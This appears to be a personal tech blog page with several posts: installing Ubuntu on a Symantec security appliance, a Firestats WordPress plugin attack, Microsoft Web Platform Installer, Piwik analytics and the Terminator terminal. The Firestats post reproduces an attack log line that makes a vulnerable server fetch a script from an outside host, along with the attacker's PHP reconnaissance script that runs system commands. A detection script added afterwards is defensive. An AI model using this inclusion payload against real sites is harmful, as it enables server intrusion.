Way back towards the end of August I inherited some fairly half decent equipment. Among them were two Symantec 5420 Security Appliances. I took them despite not knowing what it was that I was going to do with them. After a while I simply forgot about them until I decided yesterday to do something.
As the licenses had expired they weren’t much use as a security appliance so first things first was to take the cover off and have a gander inside. As I suspected an €8,000 appliance from Symantec would of course be made from the cheapest parts available. The motherboard was from a company I had never heard of in all my years called iWill. Any references on the web point to them no longer existing. The CPU is a 2GHz Celeron and it had 512MB RAM and a 40GB Maxtor hard disk. Connectivity wise there are 6 10/100Mbit Intel ethernet ports, two USB and one RS-232 ports. Inside on a riser board is a PCI slot however fitting a normal PCI card such as a display adapter is out of the question as the IDE cable would block even the shortest ones and besides, VGA cards are not supported! In the second IDE slot is a 16MB SSD.
So what was I going to do to get a new OS up and running on it? I came across a forum post from a guy who managed to get pfsense (FreeBSD) installed on it but unfortunately his instructions were a bit lacking. Out of curiosity I hooked a console cable up to the RS-232 port and opened a terminal where I was quite pleased to be greeted by a login prompt. I logged in using the username admin with the password I got from the LED panel on the front and lo and behold I was in a root shell. I guessed that Symantec’s software probably ran on one of the BSDs or Linux from experience with Nokia Checkpoint which ran NetBSD I think.
Anyway I guessed correctly, the 5420 was running RedHat Linux 7.1. From the console I was able to garner a bit more about the hardware. In addition to the basic stuff I mentioned earlier there is a Broadcom Cryptographic Accelerator CPU on board. But back to my immediate problem. How to get another OS on it. After pondering for a few moments I decided to try and see if taking the disk out and sticking it into a spare PC and setting it up from there would work. I dusted off my trusty Optiplex Gx1 circa 1999 and proceeded to install Ubuntu 9.10 on the disk.
Before I stuck the disk back in the 5420 I made sure that I could access a shell via console cable. Thankfully there is some excellent documentation on the Ubuntu help site and in no time I was able to access the Dell via console cable and have access to the Grub boot menu on boot up as well.
Back into the 5420 did the disk go, console cable hooked up, terminal open and time to power up. To my absolute delight there was the Grub boot menu. I hit enter and up it loaded. Perfect! Except for one thing. I had no network access. Half way through diagnosing this the whole thing just froze on me so I rebooted. Not long after rebooting it froze again. It was then I remembered that the guy who installed pfsense on his one mentioned problems with ACPI.
Unfortunately as it would freeze up so quickly I was unable to fix it from a terminal so I had no other choice but to take the disk out and shove it back into the Dell again. Ubuntu 9.10 has a lot of things moved about and the new version of Grub had me a bit confused for a while but finally I got ACPI disabled and everything is working perfectly.
Being headless they aren’t much good for anything other than possibly their original intention as a security appliance. However I decided to set up one of them as a dedicated monitoring server running ntop and Munin. For that it is absolutely perfect!
The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download
Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.
Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.
At present there have been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.
A sample from my logs looks like this:
http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??
The scripts themselves seem to have two versions. The most common one like above has the following contents:
<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>
The other one contains the following:
<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(“%d b”, $number); }
if($len >= 4 && $len <=6) {
return sprintf(“%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf(“%0.2f Mb”, $number/1024/1024); }
return sprintf(“%0.2f Gb”, $number/1024/1024/1024); }
echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo “0sirys was here and also is a fucking gay..<br>”;
echo “uname -a: $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all<br>”;
exit;
All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.
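A defender-side check for the request pattern in the log sample above, as an added example (not part of the original post or of Firestats): it scans access-log lines for requests to firestats-wordpress.php in which a query parameter carries a remote URL. The Combined Log Format and the addresses, hosts and timestamps in the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: Apache/nginx Combined Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)


def remote_params(target):
    """Return (name, value) pairs whose value points at a remote URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; undo double encoding too
        if REMOTE_RE.match(value):
            hits.append((name, value.strip()))
    return hits


def scan(lines, script="firestats-wordpress.php"):
    """Flag requests to `script` that pass a remote URL in any parameter."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or script not in urlsplit(m["target"]).path:
            continue
        for name, value in remote_params(m["target"]):
            findings.append({
                "ip": m["ip"],
                "param": name,
                "payload_host": urlsplit(value).hostname,
                "status": int(m["status"]),
            })
    return findings


# Constructed sample lines (documentation IP ranges, example.* hosts).
PATH = "/wp-content/plugins/firestats/firestats-wordpress.php"
SAMPLE_LOG = [
    f'203.0.113.7 - - [01/Jan/2010:10:01:02 +0000] "GET /tag{PATH}?fs_javascript=http://payload.example.org/a.txt?? HTTP/1.1" 404 512 "-" "-"',
    f'198.51.100.23 - - [01/Jan/2010:10:01:09 +0000] "GET {PATH}?fs_javascript=http%3A%2F%2Fpayload.example.net%2Fb.txt%3F HTTP/1.1" 200 1834 "-" "-"',
    f'192.0.2.44 - - [01/Jan/2010:10:02:00 +0000] "GET {PATH}?fs_javascript=1 HTTP/1.1" 200 230 "-" "-"',
    '192.0.2.44 - - [01/Jan/2010:10:02:05 +0000] "GET /index.php?ref=http://example.com/ HTTP/1.1" 200 9000 "-" "-"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        # A 200 only shows the script path answered; review that install first.
        label = "REVIEW" if f["status"] == 200 else "probe"
        print(label, f["ip"], f["param"], f["payload_host"], f["status"])
```

Grouping the findings by `payload_host` gives a short list of hosting sites to block or report, and any hit with a 200 status marks an installation to check for the plugin version.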
Microsoft have played a bit of a blinder. I’ve always found it a nightmare to set up ASP.net applications on IIS. Even getting PHP up and running and playing nice on IIS can be an absolute nightmare at times. No more however. If you are running IIS 6 or 7 then it is well worth your while installing Microsoft’s Web Platform Installer.
At the moment I’m using version 2 which is in beta but it is fine for production use albeit with one very unusual and weird quirk. If you try to install a package it will throw a wobbly if you are not in the Pacific, US and Canada time zone. So change the time zone before installing a web app and don’t forget to change it back once you are finished.
Rather than wax on about it myself I will just rehash Microsoft’s blurb:
The Microsoft Web Platform Installer 2.0 (Web PI) is a free tool that makes it simple to download, install and keep up-to-date with the latest components of the Microsoft Web Platform, including Internet Information Services (IIS), SQL Server Express, .NET Framework and Visual Web Developer. In addition, install popular open source ASP.NET and PHP web apps with the Web PI.
If you have to administer or are setting up an IIS server then it’s an essential install!
I have somewhat of an obsession of poring over my logfiles. Whichever PC or laptop I happen to be using at home will always have an ssh session open in the background with a tail of my reverse proxies logs whizzing by. But when it comes to running reports there are plenty of options. Most of which I have used and two days ago I discarded them all for a new alternative.
Up until recently I was using both Google Analytics and Woopra. They both pretty much report the same information with just a different look. One issue I noticed with both was performance. Occasionally a page would stall or load slowly while the client connected to one of my sites was waiting to load the script from either Google or Woopra. And as everybody could testify, waiting for a page to load – even if it is just for a couple of seconds – can be frustrating.
In addition to Google Analytics and Woopra I also used AWstats to parse the log file. However that would be fine for one site but when running multiple sites it can become a bit of a pain as each site has its own report. Ideally what I was looking for was something more realtime like Google Analytics and Woopra. And what I found was Piwik!
Although it is in early beta it was a doddle to set up. I created a new domain and set it up to accept stats from each of my own sites. Each site gets its own dashboard. Once you set up a site you get a little bit of code to insert somewhere on your pages.
For my WordPress powered sites I did this by simply inserting the script into the theme’s footer.php and for my primary site powered by MediaWiki it was a similar process. Although once I had everything set up I noticed that there is a WordPress plugin available.
I already mentioned it is in beta so there are a few quirks but overall it is a nice piece of software and is running rather well for me.

Screenshot from Piwik homepage.
I tend to have multiple ssh sessions open at once to my multiple *nix machines. However despite all the best attempts to keep some order all the windows tend to clutter up the desktop. Gnome terminal goes some way to easing that pain by supporting tabs but it would be even nicer if I could have multiple consoles all in a single window.
After a bit of digging I came across Gnome Terminator.
It’s a rather nice simple terminal console app but where it wins for me is that if you right click inside the terminal you can split the terminal horizontally or vertically or any combination of both. If you see my screenshot below it will give you a good idea. And yes almost all my machines are named after characters in Stargate!
Chances are that there are already pre-built binaries available for your distribution. At least there is for my Ubuntu workstation so it was a simple
sudo apt-get install terminator
It’s certainly worth checking out if like me you like to have lots of console windows open.

Terminator in action